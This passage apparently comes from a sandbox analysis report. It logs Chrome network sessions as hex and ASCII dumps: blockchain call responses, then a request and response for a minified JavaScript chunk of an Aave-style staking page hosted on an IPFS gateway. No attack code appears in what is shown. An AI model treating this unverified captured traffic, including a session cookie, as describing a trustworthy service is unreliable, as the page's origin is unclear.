                                                                                                                                                                                                                                                  Data Ascii: 0000000000000000000000000000000000000000000000000000000002a600000000000000000000000000000000000000000000000000000000000002c600000000000000000000000000000000000000000000000000000000000002e60000000000000000000000000000000000000000000000000000000000000306000
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1390INData Raw: 63 62 63 39 30 65 30 61 61 38 30 62 66 63 62 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 36 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 65 61 35 31 64 37 38 35 33 65 65 66 62 33 32 62 36 65 65 30 36 62 31 63 31 32 65 36 64 63 63 61 38 38 62 65 30 66 66 65 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 31 36 34 63 63 36 35 38 32 37 64 63 66 65 39 39 34 61 62 32 33 39 34
                                                                                                                                                                                                                                                  Data Ascii: cbc90e0aa80bfcb00000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ea51d7853eefb32b6ee06b1c12e6dcca88be0ffe0000000000000000000000008164cc65827dcfe994ab2394
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1390INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 33 39 37 33 39 39 34 33 31 39 39 63 30 66 62 66 65 39 65 35 66 31 62 35 62 31 36 30 63 64 37 33 61 36 34 63 62 38 35 64 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 31 36 34 63 63 36 35 38 32 37 64 63 66 65 39 39 34 61 62 32 33 39 34 34 63 62 63 39 30 65 30 61 61 38 30 62 66 63 62 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 36 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                                                                                                                                                                                                                  Data Ascii: 00000000000000000000000000000000000000000000000000000000039739943199c0fbfe9e5f1b5b160cd73a64cb85d0000000000000000000000008164cc65827dcfe994ab23944cbc90e0aa80bfcb0000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1390INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 39 38 63 32 33 65 39 64 38 66 33 34 66 65 66 62 31 62 37 62 64 36 61 39 31 62 37 66 66 31 32 32 66 34 65 31 36 66 35 63 30 30 30 30 30 30 30 30 30 30 30 30
                                                                                                                                                                                                                                                  Data Ascii: 0000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000018000000000000000000000000098c23e9d8f34fefb1b7bd6a91b7ff122f4e16f5c000000000000
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1390INData Raw: 30 30 30 36 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 63 66 38 64 30 63 37 30 63 38 35 30 38 35 39 32 36 36 66 35 63 33 33 38 62 33 38 66 39 64 36 36 33 31 38 31 63 33 31 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 31 36 34 63 63 36 35 38 32 37 64 63 66 65 39 39 34 61 62 32 33 39 34 34 63 62 63 39 30 65 30 61 61 38 30 62 66 63 62 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                                                                                                                                                                                                                  Data Ascii: 000600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000cf8d0c70c850859266f5c338b38f9d663181c3140000000000000000000000008164cc65827dcfe994ab23944cbc90e0aa80bfcb0000000000000000000000000000000000000000000000000000000000
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1390INData Raw: 37 66 34 35 36 37 30 37 38 37 61 63 31 32 61 39 64 66 31 31 31 30 61 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 31 36 34 63 63 36 35 38 32 37 64 63 66 65 39 39 34 61 62 32 33 39 34 34 63 62 63 39 30 65 30 61 61 38 30 62 66 63 62 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 36 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 37 66 63 36 36 35 30 30 63 38 34 61 37 36 61 64
                                                                                                                                                                                                                                                  Data Ascii: 7f45670787ac12a9df1110a0000000000000000000000008164cc65827dcfe994ab23944cbc90e0aa80bfcb000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007fc66500c84a76ad
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC946INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 39 37 37 62 36 66 63 35 64 65 36 32 35 39 38 62 30 38 63 38 35 61 63 38 63 66 32 62 37 34 35 38 37 34 65 38 62 37 38 63 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 31 36 34 63 63 36 35 38 32 37 64 63 66 65 39 39 34 61 62 32 33 39 34 34 63 62 63 39 30 65 30 61 61 38 30 62 66 63 62 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                                                                                                                                                                                                                  Data Ascii: 000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000180000000000000000000000000977b6fc5de62598b08c85ac8cf2b745874e8b78c0000000000000000000000008164cc65827dcfe994ab23944cbc90e0aa80bfcb0000000000000000000000
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1390INData Raw: 36 66 33 62 0d 0a 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 33 38 37 38 39 31 34 65 66 65 33 38 64 32 37 63 34 64 36 37 61 62 38 33 65 64 31 62 39 33 61 37 34 64 34 30 38 36 61
                                                                                                                                                                                                                                                  Data Ascii: 6f3b0000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000018000000000000000000000000023878914efe38d27c4d67ab83ed1b93a74d4086a


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  144192.168.2.549870209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC909OUTGET /_next/static/chunks/pages/staking-1d754d08e785ffe6.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                  Purpose: prefetch
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1364INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:12:00 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 34946
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreigj46sqydjsmce33lqodqe3gvuysozvg4egwf626wvb3nd3o4zs6i"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/pages/staking-1d754d08e785ffe6.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafybeiarzqpstoo26we45swmenr4cty2xldwzxkk3de3tw2jrdlwkngi2a,bafkreigj46sqydjsmce33lqodqe3gvuysozvg4egwf626wvb3nd3o4zs6i
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC139INData Raw: 78 2d 69 70 66 73 2d 70 6f 70 3a 20 72 61 69 6e 62 6f 77 2d 6e 79 35 2d 30 34 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 31 33 30 32 36 39 39 31 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 38 34 66 38 32 62 30 63 39 63 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: x-ipfs-pop: rainbow-ny5-04CF-Cache-Status: HITAge: 13026991Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e484f82b0c9c-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 38 37 39 5d 2c 7b 32 36 38 31 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 65 7d 7d 29 3b 76 61 72 20 69 3d 6e 28 31 37 36 37 34 29 2c 6f 3d 6e 28 34 39 35 30 31 29 2c 61 3d 6e 28 37 35 33 33 31 29 2c 72 3d 6e 28 35 36 33 36 35 29 2c 73 3d 6e 28 33 30 31 32 30 29 2c 6c 3d 6e 28 32 39 36 33 30 29 2c 63 3d 6e 28 37 39 30 37 32 29 2c 64 3d 6e 28 39 31 34 34 29 2c 78 3d 6e 28 37 35 30 38 34 29 2c 75 3d 6e 28 38 31 36 34
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8879],{26814:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return be}});var i=n(17674),o=n(49501),a=n(75331),r=n(56365),s=n(30120),l=n(29630),c=n(79072),d=n(9144),x=n(75084),u=n(8164
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 70 78 22 2c 62 67 63 6f 6c 6f 72 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 7d 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 53 2e 6a 73 78 73 29 28 73 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 73 70 61 63 65 2d 62 65 74 77 65 65 6e 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 53 2e 6a 73 78 29 28 77 2e 54 31 2c 7b 73 79 6d 62 6f 6c 3a 6d 7d 29 2c 28 30 2c 53 2e 6a 73 78 29 28 6c 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 73 75 62 68 65 61 64 65 72 31 22 2c 63 6f 6c 6f 72 3a 22 74 65 78 74 2e 70 72 69 6d 61 72 79 22 2c 6d 6c 3a 32 2c 63 68 69 6c 64 72 65 6e 3a 70 7d 29 5d 7d 29 2c 28 30 2c 53 2e 6a 73 78 73 29 28 73 2e 5a
                                                                                                                                                                                                                                                  Data Ascii: px",bgcolor:"transparent"}}},children:[(0,S.jsxs)(s.Z,{sx:{display:"flex",justifyContent:"space-between",alignItems:"center"},children:[(0,S.jsx)(w.T1,{symbol:m}),(0,S.jsx)(l.Z,{variant:"subheader1",color:"text.primary",ml:2,children:p})]}),(0,S.jsxs)(s.Z
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6e 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 3b 74 25 32 3f 44 28 4f 62 6a 65 63 74 28 6e 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 28 30 2c 6a 2e 5a 29 28 65 2c 74 2c 6e 5b 74 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 6e 29 29 3a 44 28 4f 62 6a 65 63 74 28 6e 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74
                                                                                                                                                                                                                                                  Data Ascii: t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?D(Object(n),!0).forEach((function(t){(0,j.Z)(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):D(Object(n)).forEach((funct
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 33 33 31 29 2c 55 3d 6e 28 33 34 36 33 37 29 2c 5f 3d 6e 28 35 39 33 37 39 29 2c 46 3d 6e 28 36 30 32 36 35 29 2c 47 3d 6e 28 38 31 39 35 29 2c 56 3d 6e 28 37 30 36 37 35 29 2c 4c 3d 6e 28 34 31 35 32 38 29 2c 4e 3d 6e 28 35 37 36 30 39 29 2c 4d 3d 6e 28 33 31 39 35 39 29 2c 57 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 70 65 6e 2c 6e 3d 65 2e 63 6c 6f 73 65 2c 69 3d 28 30 2c 41 2e 59 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 72 61 63 6b 45 76 65 6e 74 7d 29 29 3b 72 65 74 75 72 6e 28 30 2c 53 2e 6a 73 78 29 28 53 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 53 2e 6a 73 78 73 29 28 4d 2e 50 2c 7b 6f 70 65 6e 3a 74 2c 73 65 74 4f 70 65 6e 3a 6e 2c 63 68 69 6c 64 72 65 6e 3a 5b
                                                                                                                                                                                                                                                  Data Ascii: 331),U=n(34637),_=n(59379),F=n(60265),G=n(8195),V=n(70675),L=n(41528),N=n(57609),M=n(31959),W=function(e){var t=e.open,n=e.close,i=(0,A.Y)((function(e){return e.trackEvent}));return(0,S.jsx)(S.Fragment,{children:(0,S.jsxs)(M.P,{open:t,setOpen:n,children:[
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 20 50 72 6f 74 6f 63 6f 6c 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 53 2e 6a 73 78 29 28 78 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 6f 75 74 6c 69 6e 65 64 22 2c 73 69 7a 65 3a 22 73 6d 61 6c 6c 22 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 28 4e 2e 76 68 2e 45 58 54 45 52 4e 41 4c 5f 4c 49 4e 4b 2c 7b 4c 69 6e 6b 3a 22 47 65 74 20 41 42 50 54 20 54 6f 6b 65 6e 73 22 7d 29 2c 6e 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 7d 2c 22 64 61 74 61 2d 63 79 22 3a 22 67 65 74 41 62 70 2d 74 6f 6b 65 6e 22 2c 73 74 61 72 74 49 63 6f 6e 3a 28 30 2c 53 2e 6a 73 78 29 28 73 2e 5a 2c 7b 73 78 3a 7b 6d 72 3a 2d 31 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 53 2e 6a 73 78 29 28 77 2e 54 31 2c 7b 73 79 6d 62 6f 6c 3a 22 42 41 4c 22 2c 73 78
                                                                                                                                                                                                                                                  Data Ascii: Protocol",children:(0,S.jsx)(x.Z,{variant:"outlined",size:"small",onClick:function(e){a(N.vh.EXTERNAL_LINK,{Link:"Get ABPT Tokens"}),n(e.currentTarget)},"data-cy":"getAbp-token",startIcon:(0,S.jsx)(s.Z,{sx:{mr:-1},children:(0,S.jsx)(w.T1,{symbol:"BAL",sx
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 64 65 72 31 22 2c 63 6f 6c 6f 72 3a 22 74 65 78 74 2e 70 72 69 6d 61 72 79 22 2c 77 69 64 74 68 3a 5b 22 32 32 31 70 78 22 2c 22 33 30 30 70 78 22 5d 2c 74 65 78 74 41 6c 69 67 6e 3a 5b 22 6c 65 66 74 22 2c 22 63 65 6e 74 65 72 22 5d 2c 63 68 69 6c 64 72 65 6e 3a 6e 3f 28 30 2c 53 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 73 74 6b 41 41 56 45 20 68 6f 6c 64 65 72 73 20 67 65 74 20 61 20 64 69 73 63 6f 75 6e 74 20 6f 6e 20 47 48 4f 20 62 6f 72 72 6f 77 20 72 61 74 65 22 7d 29 3a 28 30 2c 53 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 48 6f 6c 64 65 72 73 20 6f 66 20 73 74 6b 41 41 56 45 20 72 65 63 65 69 76 65 20 61 20 64 69 73 63 6f 75 6e 74 20 6f 6e 20 74 68 65 20 47 48 4f 20 62 6f 72 72 6f 77 69 6e 67 20 72 61 74 65 22 7d 29 7d 29 2c 28 30 2c
                                                                                                                                                                                                                                                  Data Ascii: der1",color:"text.primary",width:["221px","300px"],textAlign:["left","center"],children:n?(0,S.jsx)(o.cC,{id:"stkAAVE holders get a discount on GHO borrow rate"}):(0,S.jsx)(o.cC,{id:"Holders of stkAAVE receive a discount on the GHO borrowing rate"})}),(0,
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 3a 28 30 2c 53 2e 6a 73 78 29 28 67 2e 42 2c 7b 76 61 6c 75 65 3a 6f 2c 73 79 6d 62 6f 6c 3a 22 55 53 44 22 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 32 2c 76 61 72 69 61 6e 74 3a 22 63 61 70 74 69 6f 6e 22 7d 29 7d 2c 6e 29 7d 29 29 7d 29 7d 29 7d 3b 72 65 74 75 72 6e 28 30 2c 53 2e 6a 73 78 73 29 28 51 2e 66 2c 7b 74 69 74 6c 65 43 6f 6d 70 6f 6e 65 6e 74 3a 28 30 2c 53 2e 6a 73 78 73 29 28 73 2e 5a 2c 7b 6d 62 3a 34 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 53 2e 6a 73 78 29 28 24 2e 5a 2c 7b 77 72 61 70 70 65 72 53 78 3a 7b 6d 62 3a 34 7d 2c 63 68 61 69 6e 49 64 3a 61 2e 61 5f 2e 6d 61 69 6e 6e 65 74 7d 29 2c 28 30 2c 53 2e 6a 73 78 73 29 28 73 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73
                                                                                                                                                                                                                                                  Data Ascii: :(0,S.jsx)(g.B,{value:o,symbol:"USD",visibleDecimals:2,variant:"caption"})},n)}))})})};return(0,S.jsxs)(Q.f,{titleComponent:(0,S.jsxs)(s.Z,{mb:4,children:[(0,S.jsx)($.Z,{wrapperSx:{mb:4},chainId:a.a_.mainnet}),(0,S.jsxs)(s.Z,{sx:{display:"flex",alignItems
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 6e 74 3a 6d 2c 73 79 6d 62 6f 6c 73 43 6f 6c 6f 72 3a 22 23 41 35 41 38 42 36 22 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 32 7d 29 7d 29 2c 28 30 2c 53 2e 6a 73 78 29 28 65 65 2e 64 2c 7b 68 69 64 65 49 63 6f 6e 3a 21 30 2c 74 69 74 6c 65 3a 28 30 2c 53 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 54 6f 74 61 6c 20 65 6d 69 73 73 69 6f 6e 20 70 65 72 20 64 61 79 22 7d 29 2c 6c 6f 61 64 69 6e 67 3a 72 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 53 2e 6a 73 78 29 28 67 2e 42 2c 7b 76 61 6c 75 65 3a 6e 7c 7c 30 2c 73 79 6d 62 6f 6c 3a 22 41 41 56 45 22 2c 76 61 72 69 61 6e 74 3a 70 2c 73 79 6d 62 6f 6c 73 56 61 72 69 61 6e 74 3a 6d 2c 73 79 6d 62 6f 6c 73 43 6f 6c 6f 72 3a 22 23 41 35 41 38 42 36 22 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a
                                                                                                                                                                                                                                                  Data Ascii: nt:m,symbolsColor:"#A5A8B6",visibleDecimals:2})}),(0,S.jsx)(ee.d,{hideIcon:!0,title:(0,S.jsx)(o.cC,{id:"Total emission per day"}),loading:r,children:(0,S.jsx)(g.B,{value:n||0,symbol:"AAVE",variant:p,symbolsVariant:m,symbolsColor:"#A5A8B6",visibleDecimals:
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 79 31 32 22 2c 63 6f 6c 6f 72 3a 30 3d 3d 3d 2b 69 3f 22 74 65 78 74 2e 6d 75 74 65 64 22 3a 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22 2c 73 79 6d 62 6f 6c 73 43 6f 6c 6f 72 3a 30 3d 3d 3d 2b 69 3f 22 74 65 78 74 2e 6d 75 74 65 64 22 3a 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22 2c 22 64 61 74 61 2d 63 79 22 3a 22 61 6d 6f 75 6e 74 55 53 44 22 7d 29 5d 7d 29 2c 28 30 2c 53 2e 6a 73 78 29 28 73 2e 5a 2c 7b 73 78 3a 7b 77 69 64 74 68 3a 22 31 30 30 25 22 2c 6d 62 3a 32 7d 2c 63 68 69 6c 64 72 65 6e 3a 6f 7d 29 2c 28 30 2c 53 2e 6a 73 78 29 28 4a 2e 58 2c 7b 63 61 70 74 69 6f 6e 3a 61 2c 63 61 70 74 69 6f 6e 56 61 72 69 61 6e 74 3a 22 63 61 70 74 69 6f 6e 22 2c 63 61 70 74 69 6f 6e 43 6f 6c 6f 72 3a 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22
                                                                                                                                                                                                                                                  Data Ascii: y12",color:0===+i?"text.muted":"text.secondary",symbolsColor:0===+i?"text.muted":"text.secondary","data-cy":"amountUSD"})]}),(0,S.jsx)(s.Z,{sx:{width:"100%",mb:2},children:o}),(0,S.jsx)(J.X,{caption:a,captionVariant:"caption",captionColor:"text.secondary"


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  145192.168.2.549871209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
